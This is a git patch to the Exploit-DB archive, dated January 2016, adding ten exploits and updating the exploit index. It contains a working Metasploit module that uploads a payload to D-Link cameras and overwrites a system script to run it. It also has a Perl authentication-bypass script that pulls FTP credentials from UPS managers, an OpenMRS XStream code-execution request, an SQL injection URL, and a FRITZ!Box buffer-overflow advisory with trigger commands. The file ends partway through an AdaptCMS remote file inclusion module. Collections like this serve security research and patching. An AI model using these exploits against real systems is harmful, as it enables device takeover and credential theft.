From 97940c47e29d6606419cdd3c613043a367bdde44 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 8 Jan 2016 05:03:43 +0000 Subject: [PATCH] DB: 2016-01-08 10 new exploits --- files.csv | 19 +- platforms/asp/webapps/39187.txt | 7 + platforms/hardware/webapps/39192.rb | 210 ++++++++++++++++++++ platforms/hardware/webapps/39194.txt | 277 +++++++++++++++++++++++++++ platforms/java/webapps/39193.txt | 55 ++++++ platforms/multiple/remote/39186.pl | 34 ++++ platforms/php/webapps/15237.rb | 83 ++++++++ platforms/php/webapps/39188.txt | 9 + platforms/php/webapps/39189.txt | 7 + platforms/php/webapps/39190.php | 18 ++ platforms/php/webapps/39191.txt | 7 + 11 files changed, 721 insertions(+), 5 deletions(-) create mode 100755 platforms/asp/webapps/39187.txt create mode 100755 platforms/hardware/webapps/39192.rb create mode 100755 platforms/hardware/webapps/39194.txt create mode 100755 platforms/java/webapps/39193.txt create mode 100755 platforms/multiple/remote/39186.pl create mode 100755 platforms/php/webapps/15237.rb create mode 100755 platforms/php/webapps/39188.txt create mode 100755 platforms/php/webapps/39189.txt create mode 100755 platforms/php/webapps/39190.php create mode 100755 platforms/php/webapps/39191.txt diff --git a/files.csv b/files.csv index 38e93c809..0dab234c2 100755 --- a/files.csv +++ b/files.csv @@ -9381,7 +9381,7 @@ id,file,description,date,author,platform,type,port 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 -10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 +10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0 @@ -12598,7 +12598,7 @@ id,file,description,date,author,platform,type,port 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0 -14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0 +14339,platforms/linux/local/14339.sh,"Ubuntu 9.10 (Karmic Koala) & 10.04 LTS (Lucid Lynx) PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0 @@ -13266,7 +13266,7 @@ id,file,description,date,author,platform,type,port 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 -15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0 +15237,platforms/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta Release - Remote File Inclusion Vulnerability (Metasploit)",2010-10-12,v3n0m,php,webapps,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 @@ -30291,8 +30291,8 @@ id,file,description,date,author,platform,type,port 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting Vulnerability",2010-02-04,s4r4d0,php,webapps,0 -33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability",2010-02-04,kingcope,linux,remote,0 -33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability (2)",2010-02-04,kingcope,linux,remote,0 +33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (Metasploit)",2010-02-04,kingcope,linux,remote,0 +33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (C)",2010-02-04,kingcope,linux,remote,0 33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0 @@ -35432,3 +35432,12 @@ id,file,description,date,author,platform,type,port 39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 +39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability",2014-05-15,jkmac,multiple,remote,0 +39187,platforms/asp/webapps/39187.txt,"CIS Manager 'email' Parameter SQL Injection Vulnerability",2014-05-16,Edge,asp,webapps,0 +39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS '/modules/glossaire/glossaire-aff.php' SQL Injection Vulnerability",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX Multiple SQL Injection Vulnerabilities",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin Arbitrary File Upload Vulnerability",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 +39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager 'backend/php/src/setup/rpc.php' Remote Code Execution Vulnerability",2014-05-20,"Manish Tanwar",php,webapps,0 +39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,metasploit,hardware,webapps,0 +39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 +39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0 diff --git a/platforms/asp/webapps/39187.txt b/platforms/asp/webapps/39187.txt new file mode 100755 index 000000000..4ca12433a --- /dev/null +++ b/platforms/asp/webapps/39187.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/67442/info + +CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection] \ No newline at end of file diff --git a/platforms/hardware/webapps/39192.rb b/platforms/hardware/webapps/39192.rb new file mode 100755 index 000000000..7c22e3402 --- /dev/null +++ b/platforms/hardware/webapps/39192.rb @@ -0,0 +1,210 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + HttpFingerprint = { :pattern => [ /alphapd/ ] } + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DCS-931L File Upload', + 'Description' => %q{ + This module exploits a file upload vulnerability in D-Link DCS-931L + network cameras. The setFileUpload functionality allows authenticated + users to upload files to anywhere on the file system, allowing system + files to be overwritten, resulting in execution of arbitrary commands. + This module has been tested successfully on a D-Link DCS-931L with + firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21). + D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly + affected, but untested. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mike Baucom', 'Allen Harper', 'J. Rach', # Initial discovery by Tangible Security + 'Brendan Coles ' # Metasploit + ], + 'Payload' => + { + 'Space' => 1024, # File upload + 'DisableNops' => true + }, + 'Platform' => 'linux', + 'Privileged' => false, + 'Targets' => + [ + [ 'Linux mipsle Payload', + { + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'CVE', '2015-2049' ], + [ 'URL', 'https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities' ], + [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049' ] # Vendor advisory + ], + 'DisclosureDate' => 'Feb 23 2015')) + + register_options( + [ + OptString.new('USERNAME', [true, 'Camera username', 'admin']), + OptString.new('PASSWORD', [false, 'Camera password (default: blank)', '']) + ], self.class) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri('uploadfile.htm'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'] + )) + + unless res + vprint_status("#{peer} - The connection timed out.") + return Exploit::CheckCode::Unknown + end + + if res.code && res.code == 404 + vprint_status("#{peer} - uploadfile.htm does not exist") + return Exploit::CheckCode::Safe + elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ + vprint_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Detected + elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe + end + + def exploit + payload_path = "/tmp/.#{rand_text_alphanumeric(rand(8) + 5)}" + + # upload payload + res = upload(payload_path, generate_payload_exe) + + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + if res.code && res.code == 404 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") + elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ + print_good("#{peer} - Payload uploaded successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") + end + register_file_for_cleanup(payload_path) + + # overwrite /sbin/chpasswd.sh with stub + res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n") + + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + if res.code && res.code == 404 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") + elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ + print_good("#{peer} - Stager uploaded successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") + end + + # execute payload using stub + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri('setSystemAdmin'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'vars_post' => Hash[{ + 'ReplySuccessPage' => 'advanced.htm', + 'ReplyErrorPage' => 'errradv.htm', + 'ConfigSystemAdmin' => 'Apply' + }.to_a.shuffle]) + + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + if res.code && res.code == 401 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif res.code && res.code == 200 && res.body + print_good("#{peer} - Payload executed successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") + end + end + + # + # Replace chpasswd.sh with original contents + # + def cleanup + chpasswd = <<-EOF +#!/bin/sh +# +# $Id: chpasswd.sh, v1.00 2009-11-05 andy +# +# usage: chpasswd.sh [] +# + +if [ "$1" == "" ]; then + echo "chpasswd: no user name" + exit 1 +fi + +echo "$1:$2" > /tmp/tmpchpw +chpasswd < /tmp/tmpchpw +rm -f /tmp/tmpchpw +EOF + res = upload('/sbin/chpasswd.sh', chpasswd) + if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ + vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + else + vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + end + end + + # + # Upload a file to a specified path + # + def upload(path, data) + vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + + boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" + post_data = "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"ReplySuccessPage\"\r\n" + post_data << "\r\nreplyuf.htm\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"ReplyErrorPage\"\r\n" + post_data << "\r\nreplyuf.htm\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n" + post_data << "\r\n#{path}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"UploadFile\"; filename=\"#{rand_text_alphanumeric(rand(8) + 5)}\"\r\n" + post_data << "Content-Type: application/octet-stream\r\n" + post_data << "\r\n#{data}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"ConfigUploadFile\"\r\n" + post_data << "\r\nUpload File\r\n" + post_data << "--#{boundary}\r\n" + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri('setFileUpload'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data) + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/39194.txt b/platforms/hardware/webapps/39194.txt new file mode 100755 index 000000000..8a00e7f4d --- /dev/null +++ b/platforms/hardware/webapps/39194.txt @@ -0,0 +1,277 @@ +Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow + +RedTeam Pentesting discovered that several models of the AVM FRITZ!Box +are vulnerable to a stack-based buffer overflow, which allows attackers +to execute arbitrary code on the device. + + +Details +======= + +Product: AVM FRITZ!Box 3272/7272, 3370/3390/3490, 7312/7412, + 7320/7330 (SL), 736x (SL) and 7490 +Affected Versions: versions prior to 6.30 (all models) [0] +Fixed Versions: >= 6.30 (all models) [0] +Vulnerability Type: Buffer Overflow +Security Risk: high +Vendor URL: http://avm.de/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-001 +Advisory Status: published +CVE: GENERIC-MAP-NOMATCH +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH + + +Introduction +============ + +FRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM +GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a +wifi access point, routing, VoIP, NAS and DECT. + + +More Details +============ + +When examining the running processes on a FRITZ!Box, it was discovered +that the program dsl_control listens on TCP port 8080: + +# netstat -anp | grep dsl_control +tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 849/dsl_control + +By sending an HTTP request to the service, it can be seen in the +server's response that the daemon expects SOAP messages (output +shortened): + +$ curl --silent http://fritz.box:8080/ | xmllint -format - + + + + + SOAP-ENV:Client + HTTP GET method not implemented + + + + +After examining the dsl_control binary by using GNU strings and +performing a web search for some of the resulting values, it was quickly +discovered that parts of the daemon's source code can be found in the +Git repository of the dd-wrt firmware[1]. + +In order to retrieve the list of all commands that are implemented by +the daemon, the following SOAP message can be sent to the server, +specifying an ifx:DslCpeCliAccess element containing an empty command +element (output shortened): + +$ curl --silent http://fritz.box:8080/ --data ' + + + + + + + +' | xmllint -format - + +[...] + + avmcr, avmcrmr, avmcrms, avmcw, avmdsmmcs, avmhwrfit, +avmpet, avmvig, acog, acos, acs, alf, asecg, asecs, asg, aufg, alig, +bbsg, bpstg, bpsg, ccadbgmlg, ccadbgmls, dbgmlg, dbgmls, dsmcg, dsmcs, +dsmmcg, dsmmcs, dsmstatg, dsmsg, dsnrg, dmms, dms, esmcg, esmcs, fddg, +fdsg, fpsg, g997amdpfcg, g997amdpfcs, g997amlfcg, g997amlfcs, g997bang, +g997bansg, g997cdrtcg, g997cdrtcs, g997csg, g997dpfsg, g997dfr, +g997dhling, g997dhlinsg, g997dhlogg, g997dqlng, g997dsnrg, g997fpsg, +g997gang, g997gansg, g997lstg, g997lacg, g997lacs, g997lfsg, g997lisg, +g997lig, g997listrg, g997lis, g997lsg, g997lspbg, g997ltsg, g997lpmcg, +g997lpmcs, g997pmsft, g997pmsg, g997racg, g997racs, g997sang, g997sansg, +g997upbosg, g997xtusecg, g997xtusecs, g997xtusesg, help, hsdg, ics, isg, +lecg, lfcg, lfcs, lfsg, locg, locs, lsg, llsg, llcg, llcs, mlsg, nsecg, +nsecs, osg, pm15meet, pmbms, pmcc15mg, pmcc1dg, pmccsg, pmcctg, +pmchs15mg, pmchs1dg, pmct15mg, pmct15ms, pmct1dg, pmct1ds, pmcg, pmcs, +pmdpc15mg, pmdpc1dg, pmdpcsg, pmdpctg, pmdpfc15mg, pmdpfc1dg, pmdpfcsg, +pmdpfctg, pmdpfhs15mg, pmdpfhs1dg, pmdphs15mg, pmdphs1dg, pmdpt15mg, +pmdpt15ms, pmdpt1dg, pmdpt1ds, pmetr, pmlesc15mg, pmlesc1dg, pmlescsg, +pmlesctg, pmleshs15mg, pmleshs1dg, pmlic15mg, pmlic1dg, pmlicsg, +pmlictg, pmlihs15mg, pmlihs1dg, pmlit15mg, pmlit15ms, pmlit1dg, +pmlit1ds, pmlsc15mg, pmlsc1dg, pmlscsg, pmlsctg, pmlshs15mg, pmlshs1dg, +pmlst15mg, pmlst15ms, pmlst1dg, pmlst1ds, pmrtc15mg, pmrtc1dg, pmrtcsg, +pmrtctg, pmrths15mg, pmrths1dg, pmrtt15mg, pmrtt15ms, pmrtt1dg, +pmrtt1ds, pmr, pmsmg, pmsms, ptsg, quit, rtsg, rccg, rccs, rsss, rusg, +se, sicg, sics, sisg, tcpmistart, tcpmistop, tmcs, tmsg, vig, + + + + +As can be seen in the listing, the server implements several commands. +Many of them can be accessed without any authentication. One of the +commands which was further examined is the 'se' or 'ScriptExecute' +command. It is defined by the file dsl_cpe_cli_access.c, which registers +the function DSL_CPE_CLI_ScriptExecute as the corresponding handler: + +[...] + DSL_CPE_CLI_CMD_ADD_COMM ( + "se", + "ScriptExecute", + DSL_CPE_CLI_ScriptExecute, + g_sSe); +[...] + +The following listing shows dd-wrt's implementation of the command, +which is also part of the file dsl_cpe_cli_access.c (shortened): + +DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute( + DSL_int_t fd, + DSL_char_t *pCommands, + DSL_CPE_File_t *out) +{ + DSL_int_t ret = 0; + DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; + + if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == + DSL_FALSE) + { + return -1; + } + + DSL_CPE_sscanf (pCommands, "%s", sFileName); + + [...] + + return 0; +} + +As can be seen in the listing, the function first checks whether +another parameter is given by calling the function +DSL_CPE_CLI_CheckParamNumber(). If this is the case, the code proceeds +to call the function DSL_CPE_sscanf() in order to copy the value of the +parameter pCommands to the local char array sFileName. Because the +format string "%s" is provided to the DSL_CPE_sscanf() function, no +restriction applies to how much data is copied to the array. Therefore, +an overlong argument passed to the function may possibly exceed the +array's bounds, leading to a buffer overflow. In order to verify that +this is the case, the following SOAP message was stored in the file +trigger.xml, containing 300 capital A characters as the argument for the +'se' command (output shortened): + + + + + + se AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + + + +Afterwards, curl was used to send the SOAP message to the service: + +$ curl --data @trigger.xml http://fritz.box:8080/ +curl: (52) Empty reply from server + +As indicated by curl's output, no HTTP reply was received. Instead, the +connection was closed. When accessing the device by using telnet, the +following crash dump is printed when sending the request, clearly +showing that the presumed buffer overflow was triggered: + +dsl_control[841] crashed at 41414140 [...] accessing 0x41414140 +Version: 06.24 +at: 2ac783d8 v0: 00000000 v1: ffffffff +a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001 +t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141 +t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141 +s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0 +s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358 +t8: 00000000 t9: 2ab3dc10 +gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141 + +As seen in the crash dump, several saved registers were overwritten by +the capital 'A' characters (0x41) provided in the SOAP message. Among +those registers is the ra register, which stores the return address of +the current function call, thus allowing an attacker to directly alter +the control flow. This behaviour can be exploited in order to execute +arbitrary code. Due to firewall restrictions, the service is only +accessible from within the internal network connected to the FRITZ!Box. +However, it is also possible to exploit this vulnerability by utilising +cross-site request forgery, allowing typical "drive-by" exploitation +through a user's web browser. + + +Workaround +========== + +None. + + +Fix +=== + +Affected users should upgrade to a fixed firmware version as soon as +possible. + + +Security Risk +============= + +After successful exploitation, attackers gain root privileges on the +attacked device. This allows attackers to eavesdrop on traffic and to +initiate and receive arbitrary phone calls, if the device is configured +for telephony. Furthermore, backdoors may be installed to allow +persistent access to the device. + +In order to exploit the vulnerability, attackers either need to be able +to connect to the service directly, i.e. from the LAN, or indirectly via +an attacker-controlled website, that is visited by a FRITZ!Box user. +This website can exploit the vulnerability via cross-site request +forgery, connecting to the service via the attacked user's browser. +Therefore, it is estimated that the vulnerability poses a high risk. + + +Timeline +======== + +2015-02-26 Vulnerability identified +2015-03-26 CVE number requested +2015-03-26 Vendor notified +2015-04-30 RedTeam Pentesting reviewed fixed version by order of vendor +2015-06-09 Vendor released fixed public beta (7490) +2015-07-16 Vendor started releasing fixed versions (7360 and 7490) +2015-10-01 Vendor finished releasing fixed versions (other models [0]) +2015-11-27 Advisory release postponed to maximize patch distribution +2016-01-07 Advisory released + + +References +========== + +[0] https://avm.de/service/sicherheitshinweise/ +[1] https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen + diff --git a/platforms/java/webapps/39193.txt b/platforms/java/webapps/39193.txt new file mode 100755 index 000000000..87a9ba064 --- /dev/null +++ b/platforms/java/webapps/39193.txt @@ -0,0 +1,55 @@ +Title: Unauthenticated remote code execution in OpenMRS +Product: OpenMRS +Vendor: OpenMRS Inc. +Tested versions: See summary +Status: Fixed by vendor +Reported by: Brian D. Hysell + +Product description: + +OpenMRS is "the world's leading open source enterprise electronic +medical record system platform." + +Vulnerability summary: + +The OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a +version of the XStream library vulnerable to CVE-2013-7285, making it +vulnerable to remote code execution. If the Appointment Scheduling UI +Module 1.0.3 is also installed, this RCE is accessible to +unauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform +1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3 +installed were confirmed to be vulnerable; other versions and +configurations containing these modules are likely to be vulnerable as +well (see "Remediation"). + +Details: + +In the Reporting module, the method saveSerializedDefinition (mapped +to module/reporting/definition/saveSerializedDefinition) in +InvalidSerializedDefinitionController can be accessed by an +unauthenticated user. + +The attacker must provide a valid UUID for a definition present in +OpenMRS or a NullPointerException will be thrown before the remote +code execution can take place. However, upon initialization the +Appointments Scheduling UI module inserts a definition with a constant +UUID hard-coded into AppointmentSchedulingUIConstants +(c1bf0730-e69e-11e3-ac10-0800200c9a66). + +Proof of concept: + +GET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=org.openmrs.OpenmrsObjectcalc.exestart&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject + +Remediation: + +The vendor has addressed this issue in OpenMRS Standalone 2.3.1, +OpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5, +1.10.3, and 1.9.10. + +Timeline: + +Vendor contacted: November 2, 2015 +Vendor replied: November 3 +CVE requested: November 14 (no response) +Patch released: December 2 +Announced: January 6, 2016 \ No newline at end of file diff --git a/platforms/multiple/remote/39186.pl b/platforms/multiple/remote/39186.pl new file mode 100755 index 000000000..82449323e --- /dev/null +++ b/platforms/multiple/remote/39186.pl @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/67438/info + +UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability. + +Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. + +#!/usr/bin/perl -w +use IO::Socket; +use constant MAXBYTES => scalar 1024; + +$socket = IO::Socket::INET->new( PeerPort => 4000, + PeerAddr => $ARGV[0], + Type => SOCK_DGRAM, + Proto => 'udp'); + +$socket->send(""); +$socket->recv($inline, MAXBYTES); +print "UPS: $inline \n"; + +$socket->send("show syspar"); +$socket->recv($inline, MAXBYTES); +print "$inline\n"; + +print "Searching login\n" ; +$socket->send("start"); +$socket->recv($inline, MAXBYTES); +$socket->send("cd /flash"); +$socket->send("type ftp_accounts.txt"); + +while($socket->recv($inline, MAXBYTES)) { + if($inline =~ /admin/ig) { print $inline; exit; } +} + +sleep(1); diff --git a/platforms/php/webapps/15237.rb b/platforms/php/webapps/15237.rb new file mode 100755 index 000000000..aad0da8e6 --- /dev/null +++ b/platforms/php/webapps/15237.rb @@ -0,0 +1,83 @@ +## +# ) ) ) ( ( ( ( ( ) ) +# ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( +# )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) +# ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ +#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) +#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / +# \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < +# |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ +# .WEB.ID +## + +## +# This file is part 